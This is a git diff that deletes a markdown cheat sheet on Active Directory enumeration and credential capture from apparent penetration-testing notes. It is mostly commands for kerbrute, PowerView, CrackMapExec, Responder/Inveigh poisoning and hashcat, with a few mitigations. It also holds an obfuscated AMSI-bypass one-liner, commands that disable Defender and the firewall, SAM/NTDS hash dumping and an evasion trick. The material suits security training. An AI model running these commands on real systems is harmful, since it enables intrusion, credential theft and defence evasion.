diff --git a/.trash/active-directory-enumeration.md b/.trash/active-directory-enumeration.md deleted file mode 100644 index bb82df7eb..000000000 --- a/.trash/active-directory-enumeration.md +++ /dev/null @@ -1,1264 +0,0 @@ ---- -title: Active Directory - Enumeration -author: amandaguglieri -draft: false -TableOfContents: true -tags: - - active - - directory - - ldap - - windows ---- - - -# Enumerating Active Directory - -**Tool for enumeration**: - -- [Enumeration with LDAP queries](389-636-ldap.md) -- [PowerView.ps1 from PowerSploit project (powershell)](powerview.md). -- [The ActiveDirectory PowerShell module (powershell)](activedirectory-powershell-module.md). -- [BloodHound (C# and PowerShell Collectors)](bloodhound.md). -- [SharpView (C#)](sharpview.md). -- [kerbrute](kerbrute.md). -- [Crackmapexec](crackmapexec.md). -- [enum4linux](enum4linux.md). -- net.exe. -- [powershell](powershell.md). -- [ActiveDirectory PowerShell Module](activedirectory-powershell-module.md). - - -## 1. Users - -### From Windows - -#### Kerbrute - -[See kerbrute](kerbrute.md). - - It takes advantage of the fact that Kerberos pre-authentication failures often will not trigger logs or alerts. - - -``` -sudo git clone https://github.com/ropnop/kerbrute.git - -# Typing make help will show us the compiling options available. -cd kerbrute -make help - -# type make all and compile one each for use on Linux, Windows, and Mac systems (an x86 and x64 version for each). -sudo make all - -# The newly created dist directory will contain our compiled binaries. -ls -la dist - -# Copy the file to the windows pivoting machine -scp kerbrute_windows_amd64.exe username@$ip:~/ -``` - -``` -kerbrute_windows_amd64.exe userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users -# d: domain -# --dc: domain controller -# -o: output file -``` - -#### powershell - -[See powershell](powershell.md) - -```powershell -# Prints all the information about the system -systeminfo - -# Prints the PC's Name -hostname - -# Am I alone -qwinsta - -# Display Powershell relevant Powershell version information -echo $PSVersion -echo $PSVersionTable - -# Prints out the OS version and revision level -[System.Environment]::OSVersion.Version - -# Prints the patches and hotfixes applied to the host -wmic qfe get Caption,Description,HotFixID,InstalledOn - -# Displays a list of environment variables for the current session (ran from CMD-prompt) -set - -# Return environment values such as key paths, users, computer information, etc. -Get-ChildItem Env: | ft Key,Value - -# Displays the domain name to which the host belongs (ran from CMD-prompt) -echo %USERDOMAIN% - -# Prints out the name of the Domain controller the host checks in with (ran from CMD-prompt) -echo %logonserver% - -#You can tell if PowerShell is running with administrator privileges (a.k.a “elevated” rights) with the following snippet: -[Security.Principal.WindowsIdentity]::GetCurrent().Groups -contains 'S-1-5-32-544' - -# Retrieves the WindowsIdentity for the currently running user. -[Security.Principal.WindowsIdentity]::GetCurrent() - -# Access the groups property of the identity to find out what user groups the identity is a member of. -[Security.Principal.WindowsIdentity]::GetCurrent()(...).groups - -# It returns true if groups contains the Well Known SID of the Administrators group (the identity will only contain it if “run as administrator” was used) and otherwise false. -[Security.Principal.WindowsIdentity]::GetCurrent() -contains "S-1-5-32-544" - -# List disabled users with LDAP -Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=2)' | select name - -``` - -Net commands in powershell: - -```powershell -# Information about domain groups -net group /domain - -# List users with domain admin privileges -net group "Domain Admins" /domain - -# List of PCs connected to the domain -net group "domain computers" /domain - -# List PC accounts of domains controllers -net group "Domain Controllers" /domain - -# User that belongs to the group -net group /domain - -# List of domain groups -net groups /domain - -# All available groups -net localgroup - -# List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default) -net localgroup administrators /domain - -# Information about a group (admins) -net localgroup Administrators - -# Add user to administrators -net localgroup administrators [username] /add - - -# Get information about a user within the domain -net user /domain - -# List all users of the domain -net user /domain - -# Information about the current user -net user %username% - -``` - - -#### Windows Management Instrumentation (WMI) - -```powershell -#Displays information about all local accounts and any domain accounts that have logged into the device -wmic useraccount list /format:list - -# Information about all local groups -wmic group list /format:list - -# Dumps information about any system accounts that are being used as service accounts. -wmic sysaccount list /format:list -``` - - -#### ActiveDirectory PowerShell module - -[See more at ActiveDirectory PowerShell module.](activedirectory-powershell-module.md) - -**Get-ADDomain**: We'll enumerate some basic information about the domain with the Get-ADDomain cmdlet. - -```powershell -# This will print out helpful information like the domain SID, domain functional level, any child domains, and more. -Get-ADDomain -``` - -**Get-ADUser**: [More on https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-aduser?view=windowsserver2022-ps](https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-aduser?view=windowsserver2022-ps). - -```powershell -# This command gets all users in the container OU=Finance,OU=UserAccounts,DC=FABRIKAM,DC=COM. -Get-ADUser -Filter * -SearchBase "OU=Finance,OU=UserAccounts,DC=FABRIKAM,DC=COM" - -# This command gets all users that have a name that ends with SvcAccount: -Get-ADUser -Filter 'Name -like "*SvcAccount"' | Format-Table Name,SamAccountName -A - -# This command gets all of the properties of the user with the SAM account name ChewDavid: -Get-ADUser -Identity ChewDavid -Properties * - -# This command gets the user with the name ChewDavid in the Active Directory Lightweight Directory Services (AD LDS) instance: -Get-ADUser -Filter "Name -eq 'ChewDavid'" -SearchBase "DC=AppNC" -Properties "mail" -Server lds.Fabrikam.com:50000 - -# This command gets all enabled user accounts in Active Directory using an LDAP filter: meaning to return all disabled accounts -Get-ADUser -LDAPFilter '(!userAccountControl:1.2.840.113556.1.4.803:=2)' - -# search for all administrative users with the `DoesNotRequirePreAuth` attribute set, meaning that they can be ASREPRoasted: -Get-ADUser -Filter {adminCount -eq '1' -and DoesNotRequirePreAuth -eq 'True'} - - - -# Find all administrative users with the SPN "servicePrincipalName" attribute set, meaning that they can likely be subject to a Kerberoasting attack -Get-ADUser -Filter "adminCount -eq '1'" -Properties * | where servicePrincipalName -ne $null | select SamAccountName,MemberOf,ServicePrincipalName | fl - -# Another way to retrieve Service Principals -Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName - -``` - -**Get-ADComputer**: - -```powershell -# Search domain computers for interesting hostnames. SQL servers are a particularly juicy target on internal assessments. The below command searches all hosts in the domain using `Get-ADComputer`, filtering on the `DNSHostName` property that contains the word `SQL` -Get-ADComputer -Filter "DNSHostName -like 'SQL*'" -``` - -**Get-ADGroup**: - -```powershell -# Group enumeration -Get-ADGroup -Filter * | select name - -# Get detailed information about a group -Get-ADGroup -Identity "Backup Operators" - -# Search for administrative groups by filtering on the `adminCount` attribute. If set to `1`, it's protected by AdminSDHolder and known as protected groups. `AdminSDHolder` is owned by the Domain Admins group. It has the privileges to change the permissions of objects in Active Directory. -Get-ADGroup -Filter "adminCount -eq 1" | select Name -``` - -**Get-ADGroupMember**: - -```powershell -# Returns members of a group -Get-ADGroupMember -Identity "Backup Operators" -``` - -**Get-ADTrust**: Verify domain trust relationships using the [Get-ADTrust](https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adtrust?view=windowsserver2022-ps) cmdlet. This cmdlet will print out any trust relationships the domain has. We can determine if they are trusts within our forest or with domains in other forests, the type of trust, the direction of the trust, and the name of the domain the relationship is with. This will be useful on when looking to take advantage of child-to-parent trust relationships and attacking across forest trusts. - -```powershell -Get-ADTrust -Filter * -``` - -#### PowerView -[See more at Powerview](powerview.md). - - -**Module: ActiveDirectory** - -```powershell -######################## -# Domain/LDAP Functions -######################## - -# Returns the AD object for the current (or specified) domain -Get-Domain - -# Return a list of the Domain Controllers for the specified domain -Get-DomainController - -# Returns all users or specific user objects in AD -Get-DomainUser -# Example: -# Get-DomainUser -Identity $username -Domain $domain | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol - -# Checks for users with the SPN attribute set -Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName - -# Returns all computers or specific computer objects in AD -Get-DomainComputer - -# Returns all groups or specific group objects in AD -Get-DomainGroup - -# Searches for all or specific OU objects in AD -Get-DomainOU - -# Finds object ACLs in the domain with modification rights set to non-built in objects -Find-InterestingDomainAcl - -# Returns the members of a specific domain group -Get-DomainGroupMember -# Example: -# Get-DomainGroupMember -Identity "Domain Admins" -Recurse -# Adding the -Recurse switch tells PowerView that if it finds any groups that are part of the target group (nested group membership) - -# Returns a list of servers likely functioning as file servers -Get-DomainFileServer - -# Returns a list of all distributed file systems for the current (or specified) domain -Get-DomainDFSShare - - -######################## -# GPO Functions -######################## -# Returns all GPOs or specific GPO objects in AD -Get-DomainGPO - -# Returns the default domain policy or the domain controller policy for the current domain -Get-DomainPolicy - - -######################## -# Computer Enumeration Functions -######################## -# Enumerates local groups on the local or a remote machine -Get-NetLocalGroup - -# Enumerates members of a specific local group -Get-NetLocalGroupMember - -# Returns open shares on the local (or a remote) machine -Get-NetShare - -# Returns session information for the local (or a remote) machine -Get-NetSession - -# Tests if the current user has administrative access to the local (or a remote) machine -Test-AdminAccess -# Example: -# Test-AdminAccess -ComputerName ACADEMY-EA-MS01 - - -######################## -# Threaded 'Meta'-Functions: -######################## -# Finds machines where specific users are logged in -Find-DomainUserLocation - -# Finds reachable shares on domain machines -Find-DomainShare - -# Searches for files matching specific criteria on readable shares in the domain -Find-InterestingDomainShareFile - -# Finds machines on the local domain where the current user has local administrator access -Find-LocalAdminAccess - - -######################## -# Domain Trust Functions: -######################## -# Returns domain trusts for the current domain or a specified domain -Get-DomainTrust - -# Returns all forest trusts for the current forest or a specified forest -Get-ForestTrust - -# Enumerates users who are in groups outside of the user's domain -Get-DomainForeignUser - -# Enumerates groups with users outside of the group's domain and returns each foreign member -Get-DomainForeignGroupMember - -# Enumerates all trusts for the current domain and any others seen. -Get-DomainTrustMapping -``` - - -```powershell -# Gets the ID for the current Domain (useful later for crafting Golden tickets) -Get-DomainID - -# Displays policies for the Domain and accounts, including for instance LockoutBadAccounts -Get-DomainPolicy - -# Requests the Kerberos ticket for a specified Service Principal Name (SPN) account -Get-DomainSPNTicket -``` - - -#### SharpView - -[More about SharpView](sharpview.md). - - -Download github repo from: [https://github.com/tevora-threat/SharpView/](https://github.com/tevora-threat/SharpView/). - - -```powershell -# Obtain help about a command -\SharpView.exe Get-DomainUser -Help - -# Get information about a given user -.\SharpView.exe Get-DomainUser -Identity $username -``` - -### From Linux - - -#### Kerbrute - -[See kerbrute](kerbrute.md). - - It takes advantage of the fact that Kerberos pre-authentication failures often will not trigger logs or alerts. - This method does not generate Windows event ID [4625: An account failed to log on](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625), or a logon failure which is often monitored for. - -**How it works?** - -Basically, the tool sends TGT requests to the domain controller without Kerberos Pre-Authentication to perform username enumeration. If the KDC responds with the error `PRINCIPAL UNKNOWN`, the username is invalid. Whenever the KDC prompts for Kerberos Pre-Authentication, this signals that the username exists, and the tool will mark it as valid. - -*This method of username enumeration does not cause logon failures and will not lock out accounts.* - - -``` -sudo git clone https://github.com/ropnop/kerbrute.git - -# Typing make help will show us the compiling options available. -cd kerbrute -make help - -# type make all and compile one each for use on Linux, Windows, and Mac systems (an x86 and x64 version for each). -sudo make all - -# The newly created dist directory will contain our compiled binaries. -ls -la dist - -# Add the tool to our PATH to make it accessible from anywhere in the host. For that we make sure first of the PATH -echo $PATH - -# and then we move the binary to a path, for instance -sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute -``` - -``` -kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users -# d: domain -# --dc: domain controller -# -o: output file -``` - -**However**, using Kerbrute for username enumeration will generate event ID [4768: A Kerberos authentication ticket (TGT) was requested](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768). Defenders can tune their SIEM tools to look for an influx of this event ID. - -#### crackmapexec - -[CrackMapExec](crackmapexec.md): - -```shell-session -# This is a useful tool that will also show the badpwdcount -crackmapexec smb $ip --users - -# Also, if we have valid credentials, we could extract the users with the flag --users -sudo crackmapexec smb $ip -u $username -p $password --users -``` - -As a matter of fact, if we have a foothold on the domain, we could perform the following enumeration: - -```powershell -# Check if we can access a machine -crackmapexec smb $ip --local-auth -u -p -d - -# Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH) -crackmapexec smb $ip -u -H -d - -# Enumerate active sessions -crackmapexec smb $ip --local-auth -u -p -d --sessions - - -# Get sam: extract hashes from all users authenticated in the machine -crackmapexec smb $ip -u -p -d --sam - -# Get the ntds.dit, given that your user has permissions -crackmapexec smb $ip -u -p -d --ntds - -# Check which machines we can access in a subnet -crackmapexec smb $ip/24 -u -p -d - -# Enumerate logged on users in other hosts of the domain -crackmapexec smb $ip --local-auth -u -p -d --loggedon-users - -# Enumerate users of the domain -sudo crackmapexec smb $ip -u -p -d --users - -crackmapexec smb $ip --local-auth -u -p -d --users - -# Enumerate groups of the domain -crackmapexec smb $ip --local-auth -u -p -d --groups - -``` - -#### rpcclient - -[rpcclient](rpcclient.md) and the  SMB NULL session technique: - -```shell-session -# Connect to a remote shared folder (same as smbclient in this regard) -rpcclient -U "" -N $ip - -# Enumerate all domains that are deployed in the network -enumdomains - -# Provides domain, server, and user information of deployed domains. -querydominfo - -# Enumerates all domain users. -enumdomusers -``` - - -#### enum4linux - -[enum4linux](enum4linux.md) - -``` -# Enumerate users -enum4linux -U $ip | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]" - -``` - - -#### ldap - -LDAP anonymous binds allow unauthenticated attackers to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. - -##### ldapsearch - -```shell-session -ldapsearch -h $ip -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" " - -``` - -Other tools related to ldap: `windapsearch.py`, `ldapsearch`, `ad-ldapdomaindump.py`. - -##### windapsearch - -[See more at windapsearch.](windapsearch.md) - - -```shell-session -# Enumerate Users -./windapsearch.py -d $domain -u $username\\ldapbind -p $password -U -# -U: returns only USERS -# -u: specifies username. "" for blank -# -p: indicates password -# -d: indicates domain - -# Enumerate users with no user foothold -./windapsearch.py --dc-ip $ip -u "" -U -# -u: specifies username. "" for blank -# -U: returns only USERS - -# Enumerate Domain Admins -./windapsearch.py --dc-ip $ip -u $username@$domain -p $password --da -./windapsearch.py -d $domain -u $username\\ldapbind -p $password --da -# --da: returns only Domain admins -# -u: specifies username. "" for blank -# -p: indicates password -# -d: indicates domain -# Example: -# python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da - -# Enumerating Computers -./windapsearch.py -d $domain -u $username\\ldapbind -p $password -C -r -# -r or --resolve option: the tool will perform a DNS lookup on every enumerated dNSHostName found and output the computer information, including IP address in CSV format. -# -C: list all matching entries where objectClass=Computer - -# Custom Search -./windapsearch.py -d $domain -u $username\\ldapbind -p $password -s Lalala -# -s: search everywhere the term, in this case Lalala. - -# Enumerate Privilege Users with -PU -python3 windapsearch.py --dc-ip $ip -u $username@$domain -p $password -PU -``` - - -## 2. Credentials - -### From Windows - -#### LLMNR/NBT-NS Poisoning with Inveigh - -[See Inveigh](inveigh.md). - -LLMNR & NBT-NS poisoning is possible from a Windows host as well.  Inveigh can listen to IPv4 and IPv6 and several other protocols, including `LLMNR`, DNS, `mDNS`, NBNS, `DHCPv6`, ICMPv6, `HTTP`, HTTPS, `SMB`, LDAP, `WebDAV`, and Proxy Auth. - -**Powershell version**: The PowerShell version of Inveigh is the original version and is no longer updated. The tool author maintains the C# version (in the belowed section). - -``` -# Install the module -Import-Module .\Inveigh.ps1 - -# List parameters -(Get-Command Invoke-Inveigh).Parameters - - -# Start Inveigh with LLMNR and NBNS spoofing, and output to the console and write to a file. -Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y -``` - - -**C# version**: Before we can use the C# version of the tool, we have to compile the executable. After that we can run: - -```powershell -.\Inveigh.exe -``` - - -Results: - -```powershell -[*] Inveigh 2.0.4 [Started 2022-02-28T20:03:28 | PID 6276] -[+] Packet Sniffer Addresses [IP 172.16.5.25 | IPv6 fe80::dcec:2831:712b:c9a3%8] -[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::] -[+] Spoofer Reply Addresses [IP 172.16.5.25 | IPv6 fe80::dcec:2831:712b:c9a3%8] -[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled] -[ ] DHCPv6 -[+] DNS Packet Sniffer [Type A] -[ ] ICMPv6 -[+] LLMNR Packet Sniffer [Type A] -[ ] MDNS -[ ] NBNS -[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80] -[ ] HTTPS -[+] WebDAV [WebDAVAuth NTLM] -[ ] Proxy -[+] LDAP Listener [Port 389] -[+] SMB Packet Sniffer [Port 445] -[+] File Output [C:\Tools] -[+] Previous Session Files (Not Found) -[*] Press ESC to enter/exit interactive console -[!] Failed to start HTTP listener on port 80, check IP and port usage. -[!] Failed to start HTTPv6 listener on port 80, check IP and port usage. -[ ] [20:03:31] mDNS(QM)(A) request [academy-ea-web0.local] from 172.16.5.125 [disabled] -[ ] [20:03:31] mDNS(QM)(AAAA) request [academy-ea-web0.local] from 172.16.5.125 [disabled] -[ ] [20:03:31] mDNS(QM)(A) request [academy-ea-web0.local] from fe80::f098:4f63:8384:d1d0%8 [disabled] -[ ] [20:03:31] mDNS(QM)(AAAA) request [academy-ea-web0.local] from fe80::f098:4f63:8384:d1d0%8 [disabled] -[+] [20:03:31] LLMNR(A) request [academy-ea-web0] from 172.16.5.125 [response sent] -[-] [20:03:31] LLMNR(AAAA) request [academy-ea-web0] from 172.16.5.125 [type ignored] -[+] [20:03:31] LLMNR(A) request [academy-ea-web0] from fe80::f098:4f63:8384:d1d0%8 [response sent] - -``` - - -- `[+]`  default option and enabled by default -- `[ ]`  disabled options - -**Console access:** Press ESC to enter/exit interactive console. The console gives us access to captured credentials/hashes, allows us to stop Inveigh, and more. - -```powershell-session -# List commands -> HELP - -# view unique captured hashes ->  GET NTLMV2UNIQUE - -# see which usernames we have collected. -GET NTLMV2USERNAMES -``` - - -Mitigations: To ensure that these spoofing attacks are not possible, we can disable LLMNR and NBT-NS. - -- We can disable LLMNR in Group Policy by going to Computer Configuration --> Administrative Templates --> Network --> DNS Client and enabling "Turn OFF Multicast Name Resolution." -- NBT-NS cannot be disabled via Group Policy but must be disabled locally on each host. We can do this by opening `Network and Sharing Center` under `Control Panel`, clicking on `Change adapter settings`, right-clicking on the adapter to view its properties, selecting `Internet Protocol Version 4 (TCP/IPv4)`, and clicking the `Properties` button, then clicking on `Advanced` and selecting the `WINS` tab and finally selecting `Disable NetBIOS over TCP/IP`. -- NBT-NS can also be disabled - - - by creating a PowerShell script under Computer Configuration --> Windows Settings --> Script (Startup/Shutdown) --> Startup with something like the following: - -```powershell -regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces" -Get-ChildItem $regkey |foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose} -``` - - - Double click on Startup, choose the PowerShell Scripts tab, and select "For this GPO, run scripts in the following order" to Run Windows PowerShell scripts first, and then click on Add and choose the script. - - Reboot the target system or restart the network adapter. - - ->To push this out to all hosts in a domain, we could create a GPO using `Group Policy Management` on the Domain Controller and host the script on the SYSVOL share in the scripts folder and then call it via its UNC path such as: `\\inlanefreight.local\SYSVOL\INLANEFREIGHT.LOCAL\scripts` -> ->Once the GPO is applied to specific OUs and those hosts are restarted, the script will run at the next reboot and disable NBT-NS, provided that the script still exists on the SYSVOL share and is accessible by the host over the network. - - -Some detection methods: [https://www.praetorian.com/blog/a-simple-and-effective-way-to-detect-broadcast-name-resolution-poisoning-bnrp/](https://www.praetorian.com/blog/a-simple-and-effective-way-to-detect-broadcast-name-resolution-poisoning-bnrp/) - - -### From Linux - -#### LLMNR/NBT-NS Poisoning - -[Link-Local Multicast Name Resolution](https://datatracker.ietf.org/doc/html/rfc4795) (LLMNR) and [NetBIOS Name Service](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc940063(v=technet.10)?redirectedfrom=MSDN) (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification that can be used when DNS fails. - -If a machine attempts to resolve a host but DNS resolution fails, typically, the machine will try to ask all other machines on the local network for the correct host address via LLMNR. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. - -It uses port `5355` over UDP natively. If LLMNR fails, the NBT-NS will be used. NBT-NS identifies systems on a local network by their NetBIOS name. NBT-NS utilizes port `137` over UDP. - -The kicker here is that when LLMNR/NBT-NS are used for name resolution, ANY host on the network can reply. This is where we come in with `Responder` to poison these requests. - -Several tools can be used to attempt LLMNR & NBT-NS poisoning: - -|**Tool**|**Description**| -|---|---| -|[Responder](https://github.com/lgandx/Responder)|Responder is a purpose-built tool to poison LLMNR, NBT-NS, and MDNS, with many different functions.| -|[Inveigh](https://github.com/Kevin-Robertson/Inveigh)|Inveigh is a cross-platform MITM platform that can be used for spoofing and poisoning attacks.| -|[Metasploit](https://www.metasploit.com/)|Metasploit has several built-in scanners and spoofing modules made to deal with poisoning attacks.| - -Listening with responder - -```bash -sudo responder -I ens224 -A -wf -# sudo privileges or root to make sure that all ports needed are available on our attack host for it to function best. -# -w: The use of the -w flag utilizes the built-in WPAD proxy server. This can be highly effective, especially in large organizations, because it will capture all HTTP requests by any users that launch Internet Explorer if the browser has Auto-detect settings enabled. -# -f: attempts to fingerprint the remote host operating system and version. -``` - -With this configuration shown above, Responder will listen and answer any requests it sees on the wire. - -All saved Hashes are located in Responder's logs directory (`/usr/share/responder/logs/`). - -**NetNTLMv2 hashes are very useful once cracked, but cannot be used for techniques such as pass-the-hash**, meaning we have to attempt to crack them offline with [hashcat](hashcat.md) or [johntheripper](john-the-ripper.md). For example, in the case of a NetNTLMv2 hash, we can copy the hash to a file and attempt to crack it using the hashcat module 5600. - -```shell-session -hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt -``` - -[See hashcat for other modules beside 5600](hashcat.md). - -> Hashes are also stored in a SQLite database that can be configured in the `Responder.conf` config file, typically located in `/usr/share/responder` unless we clone the Responder repo directly from GitHub. - - - -## 3. Password policy - -### From Windows - -Some tools work for this end: `net.exe`, PowerView, CrackMapExec ported to Windows, SharpMapExec, SharpView, etc. - -##### net.exe - -```cmd-session -net accounts -``` - -##### PowerView - -Blocked by Microsoft Defender. -PowerView gave us the same output as our net accounts command, just in a different format but also revealed that password complexity is enabled (PasswordComplexity=1). - -```powershell-session -import-module .\PowerView.ps1 - -Get-DomainPolicy -``` - -##### Windows Management Instrumentation (`WMI`) - -```powershell -# Dumps information about any system accounts that are being used as service accounts. -wmic sysaccount list /format:list -``` - -##### Powershell - -[The net.exe commands](powershell.md): - -```powershell -# Information about password requirements -net accounts - -# Password and lockout policy -net accounts /domain - -# Information about the current user -net user %username% -``` - -### From Linux - - -The password policy can also be obtained remotely with: - -#### crackmapexec - -[CrackMapExec](crackmapexec.md): - -```shell-session -# Obtain the password policy -crackmapexec smb $ip -u -p --pass-pol -``` - - -#### rpcclient - -[rpcclient](rpcclient.md) and the  SMB NULL session technique: - -```shell-session -rpcclient -U "" -N $ip - -rpcclient $> querydominfo -``` - - -#### enum4linux - -- [enum4linux](enum4linux.md) - -```shell-session -enum4linux -P $ip - -enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]" -``` - -- [enum4linux-ng](enum4linux.md) - -```shell-session -enum4linux-ng.py -P -oA ilfreight - -# Enum4linux-ng provided us with a bit clearer output and handy JSON and YAML output using the -oA flag. -cat ilfreight.json -``` - -#### Net - -With net use: - -```cmd-session -# Establish a null session from windows -net use \\DC01\ipc$ "" /u:"" - -# use a username/password combination to attempt to connect -net use \\DC01\ipc$ "" /u:guest -System error 1331 has occurred. -# Error: Account is Disabled - -net use \\DC01\ipc$ "password" /u:guest -# System error 1326 has occurred. -# The user name or password is incorrect. - -net use \\DC01\ipc$ "password" /u:guest -# System error 1909 has occurred. -# The referenced account is currently locked out and may not be logged on to. -``` - - -#### ldap - -LDAP anonymous binds allow unauthenticated attackers to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. - -```shell-session -ldapsearch -h $ip -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength -``` - -Other tools related to ldap: `windapsearch.py`, `ldapsearch`, `ad-ldapdomaindump.py`. - - - -## 4. Networks - -### From Windows - -#### Powershell and net commands - -[See powershell](powershell.md). - -```powershell -# Lists all known hosts stored in the arp table. -arp -a - -# Prints out adapter settings for the host. We can figure out the network segment from here. -ipconfig /all - -# Displays the routing table (IPv4 & IPv6) identifying known networks and layer three routes shared with the host. -route print - -# Displays the status of the host's firewall. We can determine if it is active and filtering traffic. -netsh advfirewall show allprofiles -``` - - -**Evasion trick**: If you believe the network defenders are actively logging/looking for any commands out of the normal, you can try this workaround to using net commands. Typing `net1` instead of `net` will execute the same functions without the potential trigger from the net string. [The net.exe commands](powershell.md): - -```powershell -# Information about password requirements -net accounts - -# Password and lockout policy -net accounts /domain - -# Information about domain groups -net group /domain - -# List users with domain admin privileges -net group "Domain Admins" /domain - -# List of PCs connected to the domain -net group "domain computers" /domain - -# List PC accounts of domains controllers -net group "Domain Controllers" /domain - -# User that belongs to the group -net group /domain - -# List of domain groups -net groups /domain - -# All available groups -net localgroup - -# List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default) -net localgroup administrators /domain - -# Information about a group (admins) -net localgroup Administrators - -# Add user to administrators -net localgroup administrators [username] /add - -# Check current shares -net share - -# Get information about a user within the domain -net user /domain - -# List all users of the domain -net user /domain - -# Information about the current user -net user %username% - -# Mount the share locally -net use x: \computer\share - -# Get a list of computers -net view - -# Shares on the domains -net view /all /domain[:domainname] - -# List shares of a computer -net view \computer /ALL - -# List of PCs of the domain -net view /domain -``` - - - - - -## 5. Security controls - -### From Windows - -**cmd** - -```cmd -# Check if Windows Defender is running (from CMD.exe). -sc query windefend -``` - -#### Powershell -[See powershell](powershell.md). - -**Policies and antivirus** - -```powershell -# Lists available modules loaded for use. -Get-Module - -# print the execution policy settings for each scope on a host. -Get-ExecutionPolicy -List - -#This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host. -Set-ExecutionPolicy Bypass -Scope Process -``` - - [AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) is Microsoft's application whitelisting solution and gives system administrators control over which applications and files users can run. - -```powershell -# Enumerate AppLocker policies -Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections -# If we find that a file cannot be run from a location, maybe we can try to run it from another location. - -# Quickly enumerate whether we are in Full Language Mode or Constrained Language Mode. -$ExecutionContext.SessionState.LanguageMode - -# Check current execution policy. If the answer is -# - "Restricted": Ps scripts cannot run. -# - "RemoteSigned": Downloaded scripts will require the script to be signed by a trusted publisher. -Get-Execution-Policy - -# Bypass execution policy -powershell -ep bypass - -# Get the current Defender status. -Get-MpComputerStatus - -# Deactivate antivirus from powershell session (if user has rights to do so) -Set-MpPreference -DisableRealtimeMonitoring $true - -# Disable firewall -netsh advfirewall set allprofiles state off - -# Bypass AMSI -S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} ) - -# Add a registry -reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f -``` - -#### LAPSToolkit - -[LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) is a powershell functions that leverage PowerView to audit and attack Active Directory environments that have deployed Microsoft's Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins, finding users with "All Extended Rights" that can view passwords, and viewing all computers with LAPS enabled. - -An account that has joined a computer to a domain receives `All Extended Rights` over that host, and this right gives the account the ability to read passwords. Enumeration may show a user account that can read the LAPS password on a host. This can help us target specific AD users who can read LAPS passwords. - -```powershell -# Search for computers that have LAPS enabled when passwords expire -Get-LAPSComputers - -# Searches through all OUs to see which AD groups can read the ms-Mcs-AdmPwd attribute -Find-LAPSDelegatedGroups - -# Searches through all OUs to see which AD groups can read the ms-Mcs-AdmPwd attribute, meaning Users with "All Extended Rights" can read LAPS passwords and may be less protected than users in delegated groups -Find-AdmPwdExtendedRights -``` - -#### WMI - -See [Windows Management Instrumentation (`WMI`)](135-windows-management-instrumentation-wmi.md). - -```powershell -# Prints the patch level and description of the Hotfixes applied -wmic qfe get Caption,Description,HotFixID,InstalledOn - -# Displays basic host information to include any attributes within the list -wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List - -# A listing of all processes on host -wmic process list /format:list - -# Displays information about the Domain and Domain Controllers -wmic ntdomain list /format:list - -#Displays information about all local accounts and any domain accounts that have logged into the device -wmic useraccount list /format:list - -# Information about all local groups -wmic group list /format:list - -# Dumps information about any system accounts that are being used as service accounts. -wmic sysaccount list /format:list -``` - - -[See the net.exe commands in powershell](powershell.md): - -```powershell -# Information about password requirements -net accounts - -# Password and lockout policy -net accounts /domain - -# Information about domain groups -net group /domain - -# 